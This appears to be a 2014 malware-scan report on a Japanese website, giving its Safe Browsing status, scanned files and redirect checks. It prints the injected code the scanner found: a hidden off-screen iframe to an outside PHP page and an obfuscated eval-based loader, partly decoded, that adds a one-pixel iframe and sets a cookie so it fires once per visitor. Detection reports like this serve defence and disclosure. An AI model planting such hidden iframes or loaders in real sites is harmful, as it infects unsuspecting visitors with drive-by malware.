Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yurendis-japan.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://yurendis-japan.com/ | 200 OK Content-Length: 2732 Content-Type: text/html | suspicious |
Suspicious code found <style>body {overflow-x:hidden;overflow-y:auto;} </style>
<iframe id="nair" name="nair" style="position:absolute; height: 100px; width:120px; left:5000px; top:120px;" src="http://www.sweetvine.org/7NWpK63z.php" > </iframe> | ||
http://yurendis-japan.com/AC_RunActiveContent.js | 200 OK Content-Length: 11513 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e888782872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b18 Decoded script: String String function zzzfff() { var zyty = document.createElement('iframe'); zyty.src = 'http://www.woodshedembroidery.com/admin/HfXv7DZy.php'; zyty.style.position = 'absolute'; zyty.style.border = '0'; zyty.style.height = '1px'; zyty.style.width = '1px'; zyty.style.left = '1px'; zyty.style.top = '1px'; if (!document.getElementById('zyty')) { document.write('<div id=\'zyty\'></div>'); docume ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://yurendis-japan.com/test404page.js | 404 Not Found Content-Length: 910 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yurendis-japan.com
Result:
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 07:07:11 GMT
Accept-Ranges: bytes
ETag: "99e27a3ec0d0ce1:0"
Server: Microsoft-IIS/7.5
Content-Length: 2732
Content-Type: text/html
Last-Modified: Thu, 24 Oct 2013 13:52:14 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...2732 bytes of data.
GET / HTTP/1.1
Host: yurendis-japan.com
Result:
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 07:07:11 GMT
Accept-Ranges: bytes
ETag: "99e27a3ec0d0ce1:0"
Server: Microsoft-IIS/7.5
Content-Length: 2732
Content-Type: text/html
Last-Modified: Thu, 24 Oct 2013 13:52:14 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...2732 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yurendis-japan.com
Referer: http://www.google.com/search?q=yurendis-japan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yurendis-japan.com
Referer: http://www.google.com/search?q=yurendis-japan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.